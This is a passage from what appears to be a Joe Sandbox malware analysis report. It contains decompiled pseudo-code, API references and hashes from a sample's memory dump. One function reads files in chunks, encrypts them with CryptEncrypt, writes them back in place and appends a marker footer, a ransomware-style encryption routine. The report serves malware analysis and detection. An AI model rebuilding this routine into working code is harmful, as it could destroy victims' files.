0x0132fc7c
0x0132fc7d
0x0132fc7e
0x0132fc7f
0x0132fc80
0x0132fc83
0x0132fc86
0x0132fc87
0x0132fc89
0x0132fc92
0x0132fc95
0x0132fc98
0x0132fc9b
0x0132fca4
0x0132fcaf
0x0132fcb5
0x0132fcb7
0x0132fcbc
0x0132fbfe
0x0132fbff
0x0132fc05
0x0132fc0d
0x0132fc10
0x0132fc15
0x0132fc15
0x0132fc1a
0x00000000
0x0132fc1c
0x00000000
0x0132fc1c
0x0132fc1a
0x0132fbfc
0x0132fbe8
0x0132fb86
0x0132fb2d
0x0132fb2f
0x0132fb35
0x0132fb3e
0x0132fb4d
0x0132fb4d

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,01302FD9,01302FDB,00000000,00000000,39CCA9F6,00000000,00000000,?,Function_00055BB0,013A0408,000000FE,?,01302FD9,013836C2), ref: 0132FB79
MultiByteToWideChar.KERNEL32(00000000,00000000,01302FD9,?,00000000,00000000,?,Function_00055BB0,013A0408,000000FE,?,01302FD9), ref: 0132FBF4
SysAllocString.OLEAUT32(00000000), ref: 0132FBFF
_com_issue_error.COMSUPP ref: 0132FC28
_com_issue_error.COMSUPP ref: 0132FC32
GetLastError.KERNEL32(80070057,39CCA9F6,00000000,00000000,?,Function_00055BB0,013A0408,000000FE,?,01302FD9,013836C2), ref: 0132FC37
_com_issue_error.COMSUPP ref: 0132FC4A
GetLastError.KERNEL32(00000000,?,Function_00055BB0,013A0408,000000FE,?,01302FD9,013836C2), ref: 0132FC60
_com_issue_error.COMSUPP ref: 0132FC73

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 9c64b7311d92b05d97024a282e8da38911c546a94ffbdf40ef084c1111a33903
Instruction ID: ac377e06843f2ddc38fb636244f35aa2c196973e2028f9ba039c63dfcf71d83b
Opcode Fuzzy Hash: 9c64b7311d92b05d97024a282e8da38911c546a94ffbdf40ef084c1111a33903
Instruction Fuzzy Hash: BC41F971A002259BDB24EF6CD845BAEBBFCEF48718F104229F905E7240D734A9008BE4

Uniqueness

Uniqueness Score: -1.00%

Function 013171A2, Relevance: 13.6, APIs: 9, Instructions: 139
threadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E013171A2(void* __ebx, void* __edx, void* __edi, signed int* _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				void* __esi;
				signed int _t49;
				signed int _t53;
				long _t54;
				signed int _t55;
				signed int _t61;
				signed int _t64;
				signed int _t65;
				void* _t68;
				signed int _t74;
				long _t78;
				signed int* _t88;
				void* _t89;
				signed int _t90;
				intOrPtr _t97;
				signed int* _t101;
				void* _t106;
				signed int _t112;

				_t106 = __edx;
				_t49 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t49 ^ _t112;
				_t88 = _a4;
				_t108 = _a8;
				_v28 = _t108;
				if(( *_t88 & 0xfffffeff) != 1) {
					__eflags = _t108;
					if(_t108 != 0) {
						__eflags =  *(_t108 + 4);
						_t53 =  *_t108;
						if(__eflags < 0) {
							L29:
							_t54 = GetCurrentThreadId();
							__eflags = _t88[0xa] - _t54;
							if(_t88[0xa] == _t54) {
								goto L8;
							} else {
								 *0x1374358();
								_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t88[1] + 4))))();
								_t108 = _v28;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L11;
								} else {
									goto L8;
								}
							}
						} else {
							if(__eflags > 0) {
								L17:
								_t65 = _t53 |  *(_t108 + 4);
								__eflags = _t65;
								if(_t65 != 0) {
									L19:
									E0131BE10(_t89, _t106,  &_v24, 1);
									while(1) {
										_t68 =  *_t108;
										_t97 = _v20;
										__eflags = _t97 -  *(_t108 + 4);
										if(__eflags < 0) {
											goto L26;
										}
										if(__eflags > 0) {
											L23:
											__eflags = _v24 - _t68;
											if(_v24 != _t68) {
												goto L11;
											} else {
												__eflags = _t97 -  *(_t108 + 4);
												if(_t97 !=  *(_t108 + 4)) {
													goto L11;
												} else {
													__eflags = _v16 -  *((intOrPtr*)(_t108 + 8));
													if(_v16 >=  *((intOrPtr*)(_t108 + 8))) {
														goto L11;
													} else {
														goto L26;
													}
												}
											}
										} else {
											__eflags = _v24 - _t68;
											if(_v24 < _t68) {
												goto L26;
											} else {
												goto L23;
											}
										}
										goto L36;
										L26:
										__eflags = _t88[0xa] - GetCurrentThreadId();
										if(__eflags == 0) {
											goto L8;
										} else {
											 *0x1374358(E0131BDA9(__eflags, _v28,  &_v24));
											_t101 =  &(_t88[1]);
											_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t88[1] + 8))))();
											__eflags = _t74;
											if(_t74 != 0) {
												goto L7;
											} else {
												E0131BE10(_t101, _t106,  &_v24, 1);
												_t108 = _v28;
												continue;
											}
										}
										goto L36;
									}
								} else {
									__eflags =  *((intOrPtr*)(_t108 + 8)) - _t65;
									if( *((intOrPtr*)(_t108 + 8)) <= _t65) {
										goto L29;
									} else {
										goto L19;
									}
								}
							} else {
								__eflags = _t53;
								if(_t53 < 0) {
									goto L29;
								} else {
									goto L17;
								}
							}
						}
					} else {
						_t78 = GetCurrentThreadId();
						__eflags = _t88[0xa] - _t78;
						if(_t88[0xa] != _t78) {
							 *0x1374358();
							 *( *(_t88[1]))();
							L7:
							_t108 = _v28;
						}
						L8:
						_t90 = _t88[0xb];
						_t55 = _t90 + 1;
						_t88[0xb] = _t55;
						__eflags = _t55 - 1;
						if(_t55 <= 1) {
							_t88[0xa] = GetCurrentThreadId();
							goto L35;
						} else {
							__eflags =  *_t88 & 0x00000100;
							if(( *_t88 & 0x00000100) != 0) {
								goto L35;
							} else {
								_t88[0xb] = _t90;
								__eflags = _t108;
								if(_t108 == 0) {
									L32:
									_push(3);
								} else {
									L11:
									_t61 =  *_t108 |  *(_t108 + 4);
									__eflags = _t61;
									if(_t61 != 0) {
										L13:
										_push(2);
									} else {
										__eflags =  *((intOrPtr*)(_t108 + 8)) - _t61;
										if( *((intOrPtr*)(_t108 + 8)) == _t61) {
											goto L32;
										} else {
											goto L13;
										}
									}
								}
							}
						}
					}
				} else {
					if(_t88[0xa] != GetCurrentThreadId()) {
						_t108 =  *(_t88[1]);
						 *0x1374358();
						 *( *(_t88[1]))();
						_t88[0xa] = GetCurrentThreadId();
					}
					_t88[0xb] = _t88[0xb] + 1;
					L35:
				}
				L36:
				return E0132EA79(_v8 ^ _t112, _t108);
			}

0x013171a2
0x013171a8
0x013171af
0x013171b3
0x013171b7
0x013171c2
0x013171c8
0x013171f8
0x013171fa
0x0131725c
0x01317260
0x01317262
0x013172f5
0x013172f5
0x013172fb
0x013172fe
0x00000000
0x01317304
0x0131730c
0x01317315
0x01317317
0x0131731a
0x0131731c
0x00000000
0x01317322
0x00000000
0x01317322
0x0131731c
0x01317268
0x01317268
0x01317272
0x01317272
0x01317272
0x01317275
0x0131727c
0x01317282
0x01317287
0x01317287
0x0131728b
0x0131728e
0x01317291
0x00000000
0x00000000
0x01317293
0x0131729a
0x0131729a
0x0131729d
0x00000000
0x0131729f
0x0131729f
0x013172a2
0x00000000
0x013172a4
0x013172a7
0x013172aa
0x00000000
0x00000000
0x00000000
0x00000000
0x013172aa
0x013172a2
0x01317295
0x01317295
0x01317298
0x00000000
0x00000000
0x00000000
0x00000000
0x01317298
0x00000000
0x013172ac
0x013172b2
0x013172b5
0x00000000
0x013172bb
0x013172d2
0x013172d8
0x013172db
0x013172dd
0x013172df
0x00000000
0x013172e5
0x013172eb
0x013172f0
0x00000000
0x013172f0
0x013172df
0x00000000
0x013172b5
0x01317277
0x01317277
0x0131727a
0x00000000
0x00000000
0x00000000
0x00000000
0x0131727a
0x0131726a
0x0131726a
0x0131726c
0x00000000
0x00000000
0x00000000
0x00000000
0x0131726c
0x01317268
0x013171fc
0x013171fc
0x01317202
0x01317205
0x0131720e
0x01317217
0x01317219
0x01317219
0x01317219
0x0131721c
0x0131721c
0x0131721f
0x01317222
0x01317225
0x01317228
0x01317332
0x00000000
0x0131722e
0x0131722e
0x01317234
0x00000000
0x0131723a
0x0131723a
0x0131723d
0x0131723f
0x01317327
0x01317327
0x01317245
0x01317245
0x01317247
0x01317247
0x0131724a
0x01317255
0x01317255
0x0131724c
0x0131724c
0x0131724f
0x00000000
0x00000000
0x00000000
0x00000000
0x0131724f
0x0131724a
0x01317329
0x01317234
0x01317228
0x013171ca
0x013171d3
0x013171d8
0x013171dc
0x013171e5
0x013171ed
0x013171ed
0x013171f0
0x01317335
0x01317335
0x01317337
0x01317345

APIs

GetCurrentThreadId.KERNEL32 ref: 013171CA
GetCurrentThreadId.KERNEL32 ref: 013171E7
GetCurrentThreadId.KERNEL32 ref: 013171FC
_xtime_get.LIBCPMT ref: 01317282
GetCurrentThreadId.KERNEL32 ref: 013172AC
__Xtime_diff_to_millis2.LIBCPMT ref: 013172C8
_xtime_get.LIBCPMT ref: 013172EB
GetCurrentThreadId.KERNEL32 ref: 013172F5
GetCurrentThreadId.KERNEL32 ref: 0131732C

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: 37dc579a31a970bd06d061a0506fa1c80db8d641e2a999c95c68c08e422f5d64
Instruction ID: 515a98bdc622d7dae776233c25a8f2786bf223ec5076f10ebdf4656677f58d65
Opcode Fuzzy Hash: 37dc579a31a970bd06d061a0506fa1c80db8d641e2a999c95c68c08e422f5d64
Instruction Fuzzy Hash: 4C517031900216CFDF29DF68D5859A9BBB9FF08318B294459ED06AB24DD730E982CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01309380, Relevance: 12.3, APIs: 8, Instructions: 278
fileCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E01309380(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct _OVERLAPPED* _v8;
				char _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				char _v36;
				union _LARGE_INTEGER* _v40;
				void* _v44;
				union _LARGE_INTEGER* _v48;
				void* _v52;
				intOrPtr _v56;
				struct _OVERLAPPED* _v60;
				char _v76;
				intOrPtr _v80;
				long _v84;
				char _v100;
				intOrPtr _v104;
				char _v124;
				intOrPtr _v132;
				intOrPtr _v136;
				long _v140;
				intOrPtr _v144;
				void _v148;
				union _LARGE_INTEGER* _v152;
				union _LARGE_INTEGER _v156;
				union _LARGE_INTEGER* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				void* __esi;
				void* __ebp;
				signed int _t103;
				signed int _t104;
				intOrPtr _t106;
				char* _t110;
				intOrPtr _t120;
				intOrPtr _t130;
				intOrPtr _t138;
				union _LARGE_INTEGER* _t150;
				long _t162;
				struct _OVERLAPPED* _t163;
				intOrPtr _t172;
				union _LARGE_INTEGER* _t182;
				long _t183;
				void* _t185;
				void* _t188;
				union _LARGE_INTEGER* _t189;
				union _LARGE_INTEGER _t190;
				void* _t191;
				intOrPtr _t193;
				signed int _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t203;
				void* _t217;

				_push(0xffffffff);
				_push(0x1366d55);
				_push( *[fs:0x0]);
				_t196 = _t195 - 0x9c;
				_t103 =  *0x13a4018; // 0x39cca9f6
				_t104 = _t103 ^ _t194;
				_v20 = _t104;
				_push(__ebx);
				_push(__edi);
				_push(_t104);
				 *[fs:0x0] =  &_v16;
				_v172 = __ecx;
				_t106 = _a4;
				_t185 = _a8;
				_v168 = _t106;
				if(_t106 == 0 || _t185 == 0xffffffff) {
					L36:
					goto L37;
				} else {
					_t162 = E01309150(_t106, 0, 0x2000);
					if(_t162 < 0x2000) {
						goto L36;
					}
					_t110 =  &_v36;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x20], xmm0");
					__imp__GetFileSizeEx(_t185, _t110);
					if(_t110 == 0) {
						goto L36;
					}
					_push(0);
					_v28 = 0;
					_v24 = 0;
					E012F7D00(_t162,  &_v124, __edx, _t162);
					_v8 = 0;
					_v60 = 0;
					_v56 = 0xf;
					_v76 = 0;
					_t189 = E012F57D0(_t162, __edx, _t185, 0x100010);
					_v60 = 0x100000;
					_v152 = _t189;
					_v56 = 0x10000f;
					E013478D0(_t185, _t189, 0, 0x100000);
					 *((char*)(_t189 + 0x100000)) = 0;
					E012F5760( &_v76,  &_v152);
					_t197 = _t196 + 0x18;
					_v8 = 1;
					asm("xorps xmm0, xmm0");
					_t203 = _v32;
					asm("movq [ebp-0x28], xmm0");
					asm("movlpd [ebp-0xa0], xmm0");
					if(_t203 < 0 || _t203 <= 0 && _v36 <= 0) {
						L20:
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x98], xmm0");
						_t182 = _v152;
						_t190 = _v156.LowPart;
						asm("movq [ebp-0x98], xmm0");
						_push(2);
						_v44 = _v156;
						_v52 = _t190;
						_v48 = _t182;
						_v40 = _v152;
						if(SetFilePointerEx(_t185, _t190, _t182,  &_v44) == 0) {
							goto L30;
						}
						E01309EE0(_t162, _v172, _t182, _t185,  &_v100, _v168);
						_t164 = WriteFile;
						_t128 =  >=  ? _v100 :  &_v100;
						if(WriteFile(_t185,  >=  ? _v100 :  &_v100, _v84,  &_v24, 0) == 0) {
							L28:
							_t130 = _v80;
							if(_t130 >= 0x10) {
								_push(_t130 + 1);
								E012F56A0(_t164, _t185, _v100);
								_t197 = _t197 + 8;
							}
							goto L30;
						}
						_t183 = _v84;
						if(_v24 != _t183) {
							goto L28;
						}
						_v148 = _v36;
						_v136 = _a12;
						_v144 = _v32;
						_v140 = _t183;
						_v132 = 0x1030307;
						if(WriteFile(_t185,  &_v148, 0x18,  &_v24, 0) == 0 || _v24 != 0x18) {
							goto L28;
						} else {
							_t138 = _v80;
							if(_t138 >= 0x10) {
								_push(_t138 + 1);
								E012F56A0(WriteFile, _t185, _v100);
								_t197 = _t197 + 8;
							}
							_t163 = 1;
							goto L31;
						}
					} else {
						_v152 = _v160;
						_v160 = _v164;
						while(1) {
							_push(1);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x30], xmm0");
							if(SetFilePointerEx(_t185, _v52, _v48,  &_v44) == 0) {
								break;
							}
							_t146 =  >=  ? _v76 :  &_v76;
							if(ReadFile(_t185,  >=  ? _v76 :  &_v76, 0x100000,  &_v28, 0) == 0) {
								break;
							}
							_push(0);
							if(SetFilePointerEx(_t185, _v44, _v40,  &_v52) == 0) {
								break;
							}
							_t191 = 0;
							if(_v28 <= 0) {
								L16:
								if(_a12 == 1) {
									goto L20;
								}
								_t150 = _v152;
								_t193 = _v160 + 0x100000;
								_v160 = _t193;
								asm("adc eax, 0x0");
								_v152 = _t150;
								_t217 = _t150 - _v32;
								if(_t217 < 0 || _t217 <= 0 && _t193 < _v36) {
									continue;
								} else {
									goto L20;
								}
							}
							while(1) {
								_t152 =  >=  ? _v76 :  &_v76;
								_t179 =  >=  ? _v124 :  &_v124;
								_t153 = ( >=  ? _v76 :  &_v76) + _t191;
								E01345ED0( >=  ? _v124 :  &_v124, ( >=  ? _v76 :  &_v76) + _t191, 0x2000);
								_t197 = _t197 + 0xc;
								if(E0130A0A0(_v168, 0,  &_v124, 0x2000, _t162) == 0) {
									goto L30;
								}
								_t158 =  >=  ? _v124 :  &_v124;
								if(WriteFile(_t185,  >=  ? _v124 :  &_v124, _t162,  &_v24, 0) == 0) {
									goto L30;
								}
								_t191 = _t191 + 0x2000;
								if(_t191 < _v28) {
									continue;
								}
								goto L16;
							}
							break;
						}
						L30:
						_t163 = 0;
						L31:
						_t120 = _v56;
						if(_t120 >= 0x10) {
							_push(_t120 + 1);
							E012F56A0(_t163, _t185, _v76);
							_t197 = _t197 + 8;
						}
						_t172 = _v104;
						_v60 = 0;
						_v56 = 0xf;
						_v76 = 0;
						if(_t172 >= 0x10) {
							_push(_t172 + 1);
							E012F56A0(_t163, _t185, _v124);
						}
						L37:
						 *[fs:0x0] = _v16;
						_pop(_t188);
						return E0132EA79(_v20 ^ _t194, _t188);
					}
				}
			}

0x01309383
0x01309385
0x01309390
0x01309391
0x01309397
0x0130939c
0x0130939e
0x013093a1
0x013093a3
0x013093a4
0x013093a8
0x013093ae
0x013093b4
0x013093b7
0x013093ba
0x013093c2
0x0130971f
0x00000000
0x013093d1
0x013093de
0x013093e6
0x00000000
0x00000000
0x013093ec
0x013093ef
0x013093f4
0x013093f9
0x01309401
0x00000000
0x00000000
0x01309407
0x0130940d
0x01309414
0x0130941b
0x01309420
0x0130942c
0x01309433
0x0130943a
0x01309448
0x0130944a
0x01309454
0x0130945a
0x01309461
0x0130946c
0x01309478
0x0130947d
0x01309480
0x01309484
0x01309487
0x0130948b
0x01309490
0x01309498
0x013095de
0x013095de
0x013095e1
0x013095e9
0x013095ef
0x013095f5
0x01309609
0x0130960b
0x01309615
0x01309618
0x0130961b
0x01309626
0x00000000
0x00000000
0x0130963c
0x01309648
0x01309651
0x01309661
0x013096c8
0x013096c8
0x013096ce
0x013096d1
0x013096d5
0x013096da
0x013096da
0x00000000
0x013096ce
0x01309663
0x01309669
0x00000000
0x00000000
0x01309671
0x0130967c
0x0130968e
0x01309696
0x0130969c
0x013096a7
0x00000000
0x013096af
0x013096af
0x013096b5
0x013096b8
0x013096bc
0x013096c1
0x013096c1
0x013096c4
0x00000000
0x013096c4
0x013094aa
0x013094b0
0x013094bc
0x013094c2
0x013094c2
0x013094c7
0x013094cb
0x013094df
0x00000000
0x00000000
0x013094f2
0x01309505
0x00000000
0x00000000
0x0130950b
0x01309520
0x00000000
0x00000000
0x01309526
0x0130952b
0x013095a3
0x013095a7
0x00000000
0x00000000
0x013095af
0x013095b5
0x013095bb
0x013095c1
0x013095c4
0x013095ca
0x013095cd
0x00000000
0x00000000
0x00000000
0x00000000
0x013095cd
0x01309530
0x0130953a
0x01309547
0x0130954b
0x0130954f
0x01309554
0x01309570
0x00000000
0x00000000
0x01309583
0x01309592
0x00000000
0x00000000
0x01309598
0x013095a1
0x00000000
0x00000000
0x00000000
0x013095a1
0x00000000
0x01309530
0x013096dd
0x013096dd
0x013096df
0x013096df
0x013096e5
0x013096e8
0x013096ec
0x013096f1
0x013096f1
0x013096f4
0x013096f7
0x013096fe
0x01309705
0x0130970c
0x0130970f
0x01309713
0x01309718
0x01309721
0x01309724
0x0130972d
0x0130973c
0x0130973c
0x01309498

APIs

Part of subcall function 01309150: CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0130917A

GetFileSizeEx.KERNEL32(?,?,?,00000000,00002000,39CCA9F6,00000010,00000000), ref: 013093F9
SetFilePointerEx.KERNEL32(?,?,00000000,01366D55,00000001,?,?,?,00000000,00000000), ref: 013094D7
ReadFile.KERNEL32(?,00000000,00100000,00000000,00000000,?,?,?,00000000,00000000), ref: 013094FD
SetFilePointerEx.KERNEL32(?,01366D55,000000FF,?,00000000,?,?,?,00000000,00000000), ref: 01309518
WriteFile.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,00002000,00000000), ref: 0130958A
SetFilePointerEx.KERNEL32(?,?,?,01366D55,00000002,?,?,?,00000000,00000000), ref: 0130961E
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 0130965D
WriteFile.KERNEL32(?,?,00000018,00000000,00000000,?,?,?,00000000,00000000), ref: 013096A3

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: File$PointerWrite$CryptEncryptReadSize
String ID:
API String ID: 3516733335-0
Opcode ID: 25e4167d6129881a0710d34350b71e5a32fe3715b5c8eeea9693648c6ac32293
Instruction ID: 88253086f0ff436e976d5ff6ddcb48be3bbfb9f129776f834a1d991fcb69febc
Opcode Fuzzy Hash: 25e4167d6129881a0710d34350b71e5a32fe3715b5c8eeea9693648c6ac32293
Instruction Fuzzy Hash: E4B13971D1021D9FEB21CFA8CC95BEEBBB9EF09318F540159E518B6282D771A984CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01354882, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E01354882(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t213;
				intOrPtr* _t221;
				intOrPtr* _t222;
				char* _t229;
				intOrPtr _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int _t241;
				signed int _t242;
				void* _t247;
				signed int _t248;
				intOrPtr _t250;
				void* _t254;
				signed int _t256;
				signed int _t258;
				signed int _t261;
				signed int* _t262;
				short _t263;
				signed int _t265;
				signed int _t269;
				void* _t271;
				void* _t273;

				_t265 = _t269;
				_t156 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t156 ^ _t265;
				_push(__ebx);
				_t213 = _a8;
				_push(__esi);
				_push(__edi);
				_t250 = _a4;
				_v736 = _t213;
				_v732 = E013559E0(__ecx, __edx) + 0x278;
				_t163 = E01353F6D(_t213, __edx, _t250, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t271 = _t269 - 0x2e4 + 0x18;
				if(_t163 == 0) {
					L40:
					__eflags = 0;
					goto L41;
				} else {
					_t10 = _t213 + 2; // 0x2
					_t256 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t256;
					_t221 =  *((intOrPtr*)(_t256 + _t250));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t258 = _v712;
						if( *_t166 !=  *_t221) {
							break;
						}
						if( *_t166 == 0) {
							L7:
							_t167 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t263;
							_t258 = _v712;
							if(_t263 !=  *((intOrPtr*)(_t221 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t221 = _t221 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t167 != 0) {
							_t222 =  &_v272;
							_t247 = _t222 + 2;
							do {
								_t168 =  *_t222;
								_t222 = _t222 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t222 - _t247 >> 1) + 1;
							_t171 = E013576ED(4 + ((_t222 - _t247 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L40;
							} else {
								_v720 =  *((intOrPtr*)(_t258 + _t250));
								_v740 =  *(_t250 + 0xa0 + _t213 * 4);
								_v744 =  *(_t250 + 8);
								_t229 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E01352808(_t171 + 4, _v708, _t229);
								_t273 = _t271 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E013496E7();
									asm("int3");
									_push(_t265);
									_push(_t229);
									_v784 = _v784 & 0x00000000;
									_t177 = E0135628F(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L50:
										_t178 = 0xfde9;
									} else {
										_t178 = _v12;
										__eflags = _t178;
										if(_t178 == 0) {
											goto L50;
										}
									}
									return _t178;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t258 + _t250)) = _v728;
									if(_v272 != 0x43) {
										L18:
										_t181 = E01353C8A(_t213, _t250,  &_v700);
										_t248 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L18;
										} else {
											_t248 = _v704;
											_t181 = _t248;
										}
									}
									 *(_t250 + 0xa0 + _t213 * 4) = _t181;
									__eflags = _t213 - 2;
									if(_t213 != 2) {
										__eflags = _t213 - 1;
										if(_t213 != 1) {
											__eflags = _t213 - 5;
											if(_t213 == 5) {
												 *((intOrPtr*)(_t250 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t250 + 0x10)) = _v716;
										}
									} else {
										_t262 = _v732;
										 *(_t250 + 8) = _v716;
										_v708 = _t262[8];
										_t241 = _t262[9];
										_v716 = _t241;
										while(1) {
											__eflags =  *(_t250 + 8) -  *(_t262 + _t248 * 8);
											if( *(_t250 + 8) ==  *(_t262 + _t248 * 8)) {
												break;
											}
											_t210 =  *(_t262 + _t248 * 8);
											_t241 =  *(_t262 + 4 + _t248 * 8);
											 *(_t262 + _t248 * 8) = _v708;
											 *(_t262 + 4 + _t248 * 8) = _v716;
											_t248 = _t248 + 1;
											_t213 = _v736;
											_v708 = _t210;
											_v716 = _t241;
											__eflags = _t248 - 5;
											if(_t248 < 5) {
												continue;
											} else {
											}
											L26:
											__eflags = _t248 - 5;
											if(__eflags == 0) {
												_t202 = E0135877D(_t213, _t248, _t250, __eflags, _v704, 1, 0x137c1e8, 0x7f,  &_v528,  *(_t250 + 8), 1);
												_t273 = _t273 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t242 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t265 + _t204 * 2 - 0x20c) =  *(_t265 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E013469C4( &_v528,  *0x13a41f0, 0xfe);
													_t273 = _t273 + 0xc;
													__eflags = _t206;
													_t242 = 0 | _t206 == 0x00000000;
												}
												_t262[1] = _t242;
												 *_t262 =  *(_t250 + 8);
											}
											 *(_t250 + 0x18) = _t262[1];
											goto L38;
										}
										__eflags = _t248;
										if(_t248 != 0) {
											 *_t262 =  *(_t262 + _t248 * 8);
											_t262[1] =  *(_t262 + 4 + _t248 * 8);
											 *(_t262 + _t248 * 8) = _v708;
											 *(_t262 + 4 + _t248 * 8) = _t241;
										}
										goto L26;
									}
									L38:
									_t182 = _t213 * 0xc;
									_t111 = _t182 + 0x137c270; // 0x132f829
									 *0x1374358(_t250);
									_t184 =  *((intOrPtr*)( *_t111))();
									_t233 = _v720;
									__eflags = _t184;
									if(_t184 == 0) {
										__eflags = _t233 - 0x13a42c8;
										if(_t233 != 0x13a42c8) {
											_t261 = _t213 + _t213;
											__eflags = _t261;
											asm("lock xadd [eax], ecx");
											if(_t261 != 0) {
												goto L45;
											} else {
												E01355C8F( *((intOrPtr*)(_t250 + 0x28 + _t261 * 8)));
												E01355C8F( *((intOrPtr*)(_t250 + 0x24 + _t261 * 8)));
												E01355C8F( *(_t250 + 0xa0 + _t213 * 4));
												_t236 = _v704;
												 *(_v712 + _t250) = _t236;
												 *(_t250 + 0xa0 + _t213 * 4) = _t236;
											}
										}
										_t234 = _v724;
										 *_t234 = 1;
